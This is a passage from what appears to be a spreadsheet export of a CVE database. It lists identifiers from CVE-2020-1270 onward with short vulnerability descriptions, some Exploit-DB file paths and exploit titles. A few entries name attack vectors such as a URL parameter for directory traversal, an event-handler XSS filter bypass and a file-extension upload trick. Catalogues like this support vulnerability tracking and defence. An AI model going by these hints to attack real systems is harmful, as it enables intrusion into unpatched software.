    <t>CVE-2020-1270</t>
  </si>
  <si>
    <t>exploits/php/webapps/48244.txt</t>
  </si>
  <si>
    <t>UliCMS 2020.1 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-12700</t>
  </si>
  <si>
    <t>The direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query.</t>
  </si>
  <si>
    <t>CVE-2020-12702</t>
  </si>
  <si>
    <t>Weak encryption in the Quick Pairing mode in the eWeLink mobile application (Android application V4.9.2 and earlier, iOS application V4.9.1 and earlier) allows physically proximate attackers to eavesdrop on Wi-Fi credentials and other sensitive information by monitoring the Wi-Fi spectrum during the pairing process.</t>
  </si>
  <si>
    <t>CVE-2020-12703</t>
  </si>
  <si>
    <t>UliCMS before 2020.2 has XSS during PackageController uninstall.</t>
  </si>
  <si>
    <t>CVE-2020-12704</t>
  </si>
  <si>
    <t>UliCMS before 2020.2 has PageController stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-12705</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities exist in LeptonCMS before 4.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-12706</t>
  </si>
  <si>
    <t>Multiple Cross-site scripting vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML via the go parameter to faq/faq_admin.php or shoutbox_panel/shoutbox_admin.php</t>
  </si>
  <si>
    <t>CVE-2020-12707</t>
  </si>
  <si>
    <t>An XSS vulnerability exists in modules/wysiwyg/save.php of LeptonCMS 4.5.0. This can be exploited because the only security measure used against XSS is the stripping of SCRIPT elements. A malicious actor can use HTML event handlers to run JavaScript instead of using SCRIPT elements.</t>
  </si>
  <si>
    <t>CVE-2020-12708</t>
  </si>
  <si>
    <t>Multiple cross-site scripting vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML via the cat_id parameter to downloads/downloads.php or article.php. NOTE: this might overlap CVE-2012-6043.</t>
  </si>
  <si>
    <t>CVE-2020-1271</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48587.py</t>
  </si>
  <si>
    <t>SOS JobScheduler 1.13.3 - Stored Password Decryption</t>
  </si>
  <si>
    <t>2020-06-15</t>
  </si>
  <si>
    <t>CVE-2020-12712</t>
  </si>
  <si>
    <t>A vulnerability based on insecure user/password encryption in the JOE (job editor) component of SOS JobScheduler 1.12 and 1.13 allows attackers to decrypt the user/password that is optionally stored with a user's profile.</t>
  </si>
  <si>
    <t>CVE-2020-12713</t>
  </si>
  <si>
    <t>An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account.</t>
  </si>
  <si>
    <t>CVE-2020-12714</t>
  </si>
  <si>
    <t>An issue was discovered in CipherMail Community Gateway Virtual Appliances and Professional/Enterprise Gateway Virtual Appliances versions 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger Virtual Appliances 1.1.1 through 3.1.1-0. A Diffie-Hellman parameter of insufficient size could allow man-in-the-middle compromise of communications between CipherMail products and external SMTP clients.</t>
  </si>
  <si>
    <t>CVE-2020-12715</t>
  </si>
  <si>
    <t>RainbowFish PacsOne Server 6.8.4 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-12717</t>
  </si>
  <si>
    <t>The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected.</t>
  </si>
  <si>
    <t>CVE-2020-12718</t>
  </si>
  <si>
    <t>In administration/comments.php in PHP-Fusion 9.03.50, an authenticated attacker can take advantage of a stored XSS vulnerability in the Preview Comment feature. The protection mechanism can be bypassed by using HTML event handlers such as ontoggle.</t>
  </si>
  <si>
    <t>CVE-2020-12719</t>
  </si>
  <si>
    <t>XXE during an EventPublisher update can occur in Management Console in WSO2 API Manager 3.0.0 and earlier, API Manager Analytics 2.5.0 and earlier, API Microgateway 2.2.0, Enterprise Integrator 6.4.0 and earlier, IS as Key Manager 5.9.0 and earlier, Identity Server 5.9.0 and earlier, and Identity Server Analytics 5.6.0 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-1272</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1277, CVE-2020-1302, CVE-2020-1312.</t>
  </si>
  <si>
    <t>CVE-2020-12720</t>
  </si>
  <si>
    <t>vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.</t>
  </si>
  <si>
    <t>CVE-2020-12723</t>
  </si>
  <si>
    <t>regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.</t>
  </si>
  <si>
    <t>CVE-2020-12725</t>
  </si>
  <si>
    <t>Havoc Research discovered an authenticated Server-Side Request Forgery (SSRF) via the "JSON" data source of Redash open-source 8.0.0 and prior. Possibly, other connectors are affected. The SSRF is potent and provides a lot of flexibility in terms of being able to craft HTTP requests e.g., by adding headers, selecting any HTTP verb, etc.</t>
  </si>
  <si>
    <t>CVE-2020-12729</t>
  </si>
  <si>
    <t>MagicMotion Flamingo 2 has a lack of access control for reading from device descriptors.</t>
  </si>
  <si>
    <t>CVE-2020-1273</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12730</t>
  </si>
  <si>
    <t>MagicMotion Flamingo 2 lacks BLE encryption, enabling data sniffing and packet forgery.</t>
  </si>
  <si>
    <t>CVE-2020-12731</t>
  </si>
  <si>
    <t>The MagicMotion Flamingo 2 application for Android stores data on an sdcard under com.vt.magicmotion/files/Pictures, whence it can be read by other applications.</t>
  </si>
  <si>
    <t>CVE-2020-12732</t>
  </si>
  <si>
    <t>DEPSTECH WiFi Digital Microscope 3 has a default SSID of Jetion_xxxxxxxx with a password of 12345678.</t>
  </si>
  <si>
    <t>CVE-2020-12733</t>
  </si>
  <si>
    <t>Certain Shenzhen PENGLIXIN components on DEPSTECH WiFi Digital Microscope 3, as used by Shekar Endoscope, allow a TELNET connection with the molinkadmin password for the molink account.</t>
  </si>
  <si>
    <t>CVE-2020-12734</t>
  </si>
  <si>
    <t>DEPSTECH WiFi Digital Microscope 3 allows remote attackers to change the SSID and password, and demand a ransom payment from the rightful device owner, because there is no way to reset to Factory Default settings.</t>
  </si>
  <si>
    <t>CVE-2020-12735</t>
  </si>
  <si>
    <t>reset.php in DomainMOD 4.13.0 uses insufficient entropy for password reset requests, leading to account takeover.</t>
  </si>
  <si>
    <t>CVE-2020-12736</t>
  </si>
  <si>
    <t>Code42 environments with on-premises server versions 7.0.4 and earlier allow for possible remote code execution. When an administrator creates a local (non-SSO) user via a Code42-generated email, the administrator has the option to modify content for the email invitation. If the administrator entered template language code in the subject line, that code could be interpreted by the email generation services, potentially resulting in server-side code injection.</t>
  </si>
  <si>
    <t>CVE-2020-12737</t>
  </si>
  <si>
    <t>An issue was discovered in Maxum Rumpus before 8.2.12 on macOS. Authenticated users can perform a path traversal using double escaped characters, enabling read access to arbitrary files on the server.</t>
  </si>
  <si>
    <t>CVE-2020-12739</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability in the Fanuc i Series CNC (0i-MD and 0i Mate-MD) could allow an unauthenticated, remote attacker to cause an affected CNC to become inaccessible to other devices.</t>
  </si>
  <si>
    <t>CVE-2020-1274</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12740</t>
  </si>
  <si>
    <t>tcprewrite in Tcpreplay through 4.3.2 has a heap-based buffer over-read during a get_c operation. The issue is being triggered in the function get_ipv6_next() at common/get.c.</t>
  </si>
  <si>
    <t>CVE-2020-12742</t>
  </si>
  <si>
    <t>The iubenda-cookie-law-solution plugin before 2.3.5 for WordPress does not restrict URL sanitization to http protocols.</t>
  </si>
  <si>
    <t>CVE-2020-12743</t>
  </si>
  <si>
    <t>An issue was discovered in Gazie 7.32. A successful installation does not remove or block (or in any other way prevent use of) its own file /setup/install/setup.php, meaning that anyone can request it without authentication. This file allows arbitrary PHP file inclusion via a hidden_req POST parameter.</t>
  </si>
  <si>
    <t>CVE-2020-12744</t>
  </si>
  <si>
    <t>The MSI installer in Verint Desktop Resources 15.2 allows an unprivileged local user to elevate their privileges during install or repair.</t>
  </si>
  <si>
    <t>CVE-2020-12745</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and access clipboard content via USSD. The Samsung ID is SVE-2019-16556 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12746</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) (Exynos chipsets) software. Attackers can bypass the Secure Bootloader protection mechanism via a heap-based buffer overflow to execute arbitrary code. The Samsung ID is SVE-2020-16712 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12747</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) (Exynos980 9630 and Exynos990 9830 chipsets) software. The Bootloader has a heap-based buffer overflow because of the mishandling of specific commands. The Samsung IDs are SVE-2020-16981, SVE-2020-16991 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12748</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass the locked-state protection mechanism and designate a different preferred SIM card. The Samsung ID is SVE-2020-16594 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12749</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) (Exynos chipsets) software. The S.LSI Wi-Fi drivers have a buffer overflow. The Samsung ID is SVE-2020-16906 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-1275</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12750</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. Attackers can bypass Factory Reset Protection (FRP) via SPEN. The Samsung ID is SVE-2020-17019 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12751</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) software. The Quram image codec library allows attackers to overwrite memory and execute arbitrary code via crafted JPEG data that is mishandled during decoding. The Samsung ID is SVE-2020-16943 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12752</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (with TEEGRIS) software. Attackers can determine user credentials via a brute-force attack against the Gatekeeper trustlet. The Samsung ID is SVE-2020-16908 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12753</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader because of an EL1/EL3 coldboot vulnerability involving raw_resources. The LG ID is LVE-SMP-200006 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12754</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. A crafted application can obtain control of device input via the window system service. The LG ID is LVE-SMP-170011 (May 2020).</t>
  </si>
  <si>
    <t>CVE-2020-12755</t>
  </si>
  <si>
    <t>fishProtocol::establishConnection in fish/fish.cpp in KDE kio-extras through 20.04.0 makes a cacheAuthentication call even if the user had not set the keepPassword option. This may lead to unintended KWallet storage of a password.</t>
  </si>
  <si>
    <t>CVE-2020-12757</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise 1.4.0 and 1.4.1, when configured with the GCP Secrets Engine, may incorrectly generate GCP Credentials with the default time-to-live lease duration instead of the engine-configured setting. This may lead to generated GCP credentials being valid for longer than intended. Fixed in 1.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-12758</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise could crash when configured with an abnormally-formed service-router entry. Introduced in 1.6.0, fixed in 1.6.6 and 1.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-12759</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.5 allows reflected XSS via the Dropbox webhook.</t>
  </si>
  <si>
    <t>CVE-2020-1276</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1307, CVE-2020-1316.</t>
  </si>
  <si>
    <t>CVE-2020-12760</t>
  </si>
  <si>
    <t>An issue was discovered in OpenNMS Horizon before 26.0.1, and Meridian before 2018.1.19 and 2019 before 2019.1.7. The ActiveMQ channel configuration allowed for arbitrary deserialization of Java objects (aka ActiveMQ Minion payload deserialization), leading to remote code execution for any authenticated channel user regardless of its assigned permissions.</t>
  </si>
  <si>
    <t>CVE-2020-12761</t>
  </si>
  <si>
    <t>modules/loaders/loader_ico.c in imlib2 1.6.0 has an integer overflow (with resultant invalid memory allocations and out-of-bounds reads) via an icon with many colors in its color map.</t>
  </si>
  <si>
    <t>CVE-2020-12762</t>
  </si>
  <si>
    <t>json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.</t>
  </si>
  <si>
    <t>CVE-2020-12763</t>
  </si>
  <si>
    <t>TRENDnet ProView Wireless camera TV-IP512WN 1.0R 1.0.4 is vulnerable to an unauthenticated stack-based buffer overflow in handling RTSP packets. This may result in remote code execution or denial of service. The issue is in the binary rtspd (in /sbin) when parsing a long "Authorization: Basic" RTSP header.</t>
  </si>
  <si>
    <t>CVE-2020-12764</t>
  </si>
  <si>
    <t>Gnuteca 3.8 allows file.php?folder=/&amp;file= Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-12765</t>
  </si>
  <si>
    <t>Solis Miolo 2.0 allows index.php?module=install&amp;action=view&amp;item= Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-12766</t>
  </si>
  <si>
    <t>Gnuteca 3.8 allows action=main:search:simpleSearch SQL Injection via the exemplaryStatusId parameter.</t>
  </si>
  <si>
    <t>CVE-2020-12767</t>
  </si>
  <si>
    <t>exif_entry_get_value in exif-entry.c in libexif 0.6.21 has a divide-by-zero error.</t>
  </si>
  <si>
    <t>CVE-2020-12768</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in the Linux kernel before 5.6. svm_cpu_uninit in arch/x86/kvm/svm.c has a memory leak, aka CID-d80b64ff297e. NOTE: third parties dispute this issue because it's a one-time leak at the boot, the size is negligible, and it can't be triggered at will.</t>
  </si>
  <si>
    <t>CVE-2020-12769</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.4.17. drivers/spi/spi-dw.c allows attackers to cause a panic via concurrent calls to dw_spi_irq and dw_spi_transfer_one, aka CID-19b61392c5a8.</t>
  </si>
  <si>
    <t>CVE-2020-1277</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations.To exploit the vulnerability, an attacker would require unprivileged execution on the victim system, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1272, CVE-2020-1302, CVE-2020-1312.</t>
  </si>
  <si>
    <t>CVE-2020-12770</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040.</t>
  </si>
  <si>
    <t>CVE-2020-12771</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel through 5.6.11. btree_gc_coalesce in drivers/md/bcache/btree.c has a deadlock if a coalescing operation fails.</t>
  </si>
  <si>
    <t>CVE-2020-12772</t>
  </si>
  <si>
    <t>An issue was discovered in Ignite Realtime Spark 2.8.3 (and the ROAR plugin for it) on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the (NT)LM hashes of the user are sent with the HTTP request. This allows an attacker to collect these hashes, crack them, and potentially compromise the computer. (ROAR can be configured for automatic access. Also, access can occur if the user clicks.)</t>
  </si>
  <si>
    <t>CVE-2020-12773</t>
  </si>
  <si>
    <t>A security misconfiguration vulnerability exists in the SDK of some Realtek ADSL/PON Modem SoC firmware, which allows attackers using a default password to execute arbitrary commands remotely via the build-in network monitoring tool.</t>
  </si>
  <si>
    <t>CVE-2020-12774</t>
  </si>
  <si>
    <t>D-Link DSL-7740C does not properly validate user input, which allows an authenticated LAN user to inject arbitrary command.</t>
  </si>
  <si>
    <t>CVE-2020-12775</t>
  </si>
  <si>
    <t>Hicos citizen certificate client-side component does not filter special characters for command parameters in specific web URLs. An unauthenticated remote attacker can exploit this vulnerability to perform command injection attack to execute arbitrary system command, disrupt system or terminate service.</t>
  </si>
  <si>
    <t>CVE-2020-12776</t>
  </si>
  <si>
    <t>Openfind Mail2000 contains Broken Access Control vulnerability, which can be used to execute unauthorized commands after attackers obtain the administrator access token or cookie.</t>
  </si>
  <si>
    <t>CVE-2020-12777</t>
  </si>
  <si>
    <t>A function in Combodo iTop contains a vulnerability of Broken Access Control, which allows unauthorized attacker to inject command and disclose system information.</t>
  </si>
  <si>
    <t>CVE-2020-12778</t>
  </si>
  <si>
    <t>Combodo iTop does not validate inputted parameters, attackers can inject malicious commands and launch XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-12779</t>
  </si>
  <si>
    <t>Combodo iTop contains a stored Cross-site Scripting vulnerability, which can be attacked by uploading file with malicious script.</t>
  </si>
  <si>
    <t>CVE-2020-1278</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1257, CVE-2020-1293.</t>
  </si>
  <si>
    <t>CVE-2020-12780</t>
  </si>
  <si>
    <t>A security misconfiguration exists in Combodo iTop, which can expose sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-12781</t>
  </si>
  <si>
    <t>Combodo iTop contains a cross-site request forgery (CSRF) vulnerability, attackers can execute specific commands via malicious site request forgery.</t>
  </si>
  <si>
    <t>CVE-2020-12782</t>
  </si>
  <si>
    <t>Openfind MailGates contains a Command Injection flaw, when receiving email with specific strings, malicious code in the mail attachment will be triggered and gain unauthorized access to system files.</t>
  </si>
  <si>
    <t>CVE-2020-12783</t>
  </si>
  <si>
    <t>Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c.</t>
  </si>
  <si>
    <t>CVE-2020-12784</t>
  </si>
  <si>
    <t>cPanel before 86.0.14 allows remote attackers to trigger a bandwidth suspension via mail log strings (SEC-505).</t>
  </si>
  <si>
    <t>CVE-2020-12785</t>
  </si>
  <si>
    <t>cPanel before 86.0.14 allows attackers to obtain access to the current working directory via the account backup feature (SEC-540).</t>
  </si>
  <si>
    <t>CVE-2020-12787</t>
  </si>
  <si>
    <t>Microchip Atmel ATSAMA5 products in Secure Mode allow an attacker to bypass existing security mechanisms related to applet handling.</t>
  </si>
  <si>
    <t>CVE-2020-12788</t>
  </si>
  <si>
    <t>CMAC verification functionality in Microchip Atmel ATSAMA5 products is vulnerable to vulnerable to timing and power analysis attacks.</t>
  </si>
  <si>
    <t>CVE-2020-12789</t>
  </si>
  <si>
    <t>The Secure Monitor in Microchip Atmel ATSAMA5 products use a hardcoded key to encrypt and authenticate secure applets.</t>
  </si>
  <si>
    <t>CVE-2020-1279</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location, aka 'Windows Lockscreen Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12790</t>
  </si>
  <si>
    <t>In the SEOmatic plugin before 3.2.49 for Craft CMS, helpers/DynamicMeta.php does not properly sanitize the URL. This leads to Server-Side Template Injection and credentials disclosure via a crafted Twig template after a semicolon.</t>
  </si>
  <si>
    <t>CVE-2020-12797</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise failed to enforce changes to legacy ACL token rules due to non-propagation to secondary data centers. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-12798</t>
  </si>
  <si>
    <t>Cellebrite UFED 5.0 to 7.5.0.845 implements local operating system policies that can be circumvented to obtain a command prompt via the Windows file dialog that is reachable via the Certificate-Based Authentication option of the Wireless Network Connection screen.</t>
  </si>
  <si>
    <t>CVE-2020-1280</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory, aka 'Windows Bluetooth Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12800</t>
  </si>
  <si>
    <t>The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.</t>
  </si>
  <si>
    <t>CVE-2020-12801</t>
  </si>
  <si>
    <t>If LibreOffice has an encrypted document open and crashes, that document is auto-saved encrypted. On restart, LibreOffice offers to restore the document and prompts for the password to decrypt it. If the recovery is successful, and if the file format of the recovered document was not LibreOffice's default ODF file format, then affected versions of LibreOffice default that subsequent saves of the document are unencrypted. This may lead to a user accidentally saving a MSOffice file format document unencrypted while believing it to be encrypted. This issue affects: LibreOffice 6-3 series versions prior to 6.3.6; 6-4 series versions prior to 6.4.3.</t>
  </si>
  <si>
    <t>CVE-2020-12802</t>
  </si>
  <si>
    <t>LibreOffice has a 'stealth mode' in which only documents from locations deemed 'trusted' are allowed to retrieve remote resources. This mode is not the default mode, but can be enabled by users who want to disable LibreOffice's ability to include remote resources within a document. A flaw existed where remote graphic links loaded from docx documents were omitted from this protection prior to version 6.4.4. This issue affects: The Document Foundation LibreOffice versions prior to 6.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-12803</t>
  </si>
  <si>
    <t>ODF documents can contain forms to be filled out by the user. Similar to HTML forms, the contained form data can be submitted to a URI, for example, to an external web server. To create submittable forms, ODF implements the XForms W3C standard, which allows data to be submitted without the need for macros or other active scripting Prior to version 6.4.4 LibreOffice allowed forms to be submitted to any URI, including file: URIs, enabling form submissions to overwrite local files. User-interaction is required to submit the form, but to avoid the possibility of malicious documents engineered to maximize the possibility of inadvertent user submission this feature has now been limited to http[s] URIs, removing the possibility to overwrite local files. This issue affects: The Document Foundation LibreOffice versions prior to 6.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-1281</t>
  </si>
  <si>
    <t>CVE-2020-12811</t>
  </si>
  <si>
    <t>An improper neutralization of script-related HTML tags in a web page in FortiManager 6.2.0, 6.2.1, 6.2.2, and 6.2.3and FortiAnalyzer 6.2.0, 6.2.1, 6.2.2, and 6.2.3 may allow an attacker to execute a cross site scripting (XSS) via the Identify Provider name field.</t>
  </si>
  <si>
    <t>CVE-2020-12812</t>
  </si>
  <si>
    <t>An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.</t>
  </si>
  <si>
    <t>CVE-2020-12814</t>
  </si>
  <si>
    <t>A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiAnalyzer version 6.0.6 and below, version 6.4.4 allows attacker to execute unauthorized code or commands via specifically crafted requests to the web GUI.</t>
  </si>
  <si>
    <t>CVE-2020-12815</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiTester before 3.9.0 may allow a remote authenticated attacker to inject script related HTML tags via IPv4/IPv6 address fields.</t>
  </si>
  <si>
    <t>CVE-2020-12816</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiNAC before 8.7.2 may allow a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the UserID of Admin Users.</t>
  </si>
  <si>
    <t>CVE-2020-12817</t>
  </si>
  <si>
    <t>An improper neutralization of input vulnerability in FortiAnalyzer before 6.4.1 and 6.2.5 may allow a remote authenticated attacker to inject script related HTML tags via Name parameter of Storage Connectors.</t>
  </si>
  <si>
    <t>CVE-2020-12818</t>
  </si>
  <si>
    <t>An insufficient logging vulnerability in FortiGate before 6.4.1 may allow the traffic from an unauthenticated attacker to Fortinet owned IP addresses to go unnoticed.</t>
  </si>
  <si>
    <t>CVE-2020-1282</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334.</t>
  </si>
  <si>
    <t>CVE-2020-12821</t>
  </si>
  <si>
    <t>Gossipsub 1.0 does not properly resist invalid message spam, such as an eclipse attack or a sybil attack.</t>
  </si>
  <si>
    <t>CVE-2020-12823</t>
  </si>
  <si>
    <t>OpenConnect 8.09 has a buffer overflow, causing a denial of service (application crash) or possibly unspecified other impact, via crafted certificate data to get_cert_name in gnutls.c.</t>
  </si>
  <si>
    <t>CVE-2020-12824</t>
  </si>
  <si>
    <t>Pexip Infinity 23.x before 23.3 has improper input validation, leading to a temporary software abort via RTP.</t>
  </si>
  <si>
    <t>CVE-2020-12825</t>
  </si>
  <si>
    <t>libcroco through 0.6.13 has excessive recursion in cr_parser_parse_any_core in cr-parser.c, leading to stack consumption.</t>
  </si>
  <si>
    <t>CVE-2020-12826</t>
  </si>
  <si>
    <t>A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.</t>
  </si>
  <si>
    <t>CVE-2020-12827</t>
  </si>
  <si>
    <t>MJML prior to 4.6.3 contains a path traversal vulnerability when processing the mj-include directive within an MJML document.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-12828</t>
  </si>
  <si>
    <t>An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-12829</t>
  </si>
  <si>
    <t>In QEMU through 5.0.0, an integer overflow was found in the SM501 display driver implementation. This flaw occurs in the COPY_AREA macro while handling MMIO write operations through the sm501_2d_engine_write() callback. A local attacker could abuse this flaw to crash the QEMU process in sm501_2d_operation() in hw/display/sm501.c on the host, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1283</t>
  </si>
  <si>
    <t>CVE-2020-12830</t>
  </si>
  <si>
    <t>Addressed multiple stack buffer overflow vulnerabilities that could allow an attacker to carry out escalation of privileges through unauthorized remote code execution in Western Digital My Cloud devices before 5.04.114.</t>
  </si>
  <si>
    <t>CVE-2020-12831</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in FRRouting FRR (aka Free Range Routing) through 7.3.1. When using the split-config feature, the init script creates an empty config file with world-readable default permissions, leading to a possible information leak via tools/frr.in and tools/frrcommon.sh.in. NOTE: some parties consider this user error, not a vulnerability, because the permissions are under the control of the user before any sensitive information is present in the file.</t>
  </si>
  <si>
    <t>CVE-2020-12832</t>
  </si>
  <si>
    <t>WordPress Plugin Simple File List before 4.2.8 is prone to a vulnerability that lets attackers delete arbitrary files because the application fails to properly verify user-supplied input.</t>
  </si>
  <si>
    <t>CVE-2020-12834</t>
  </si>
  <si>
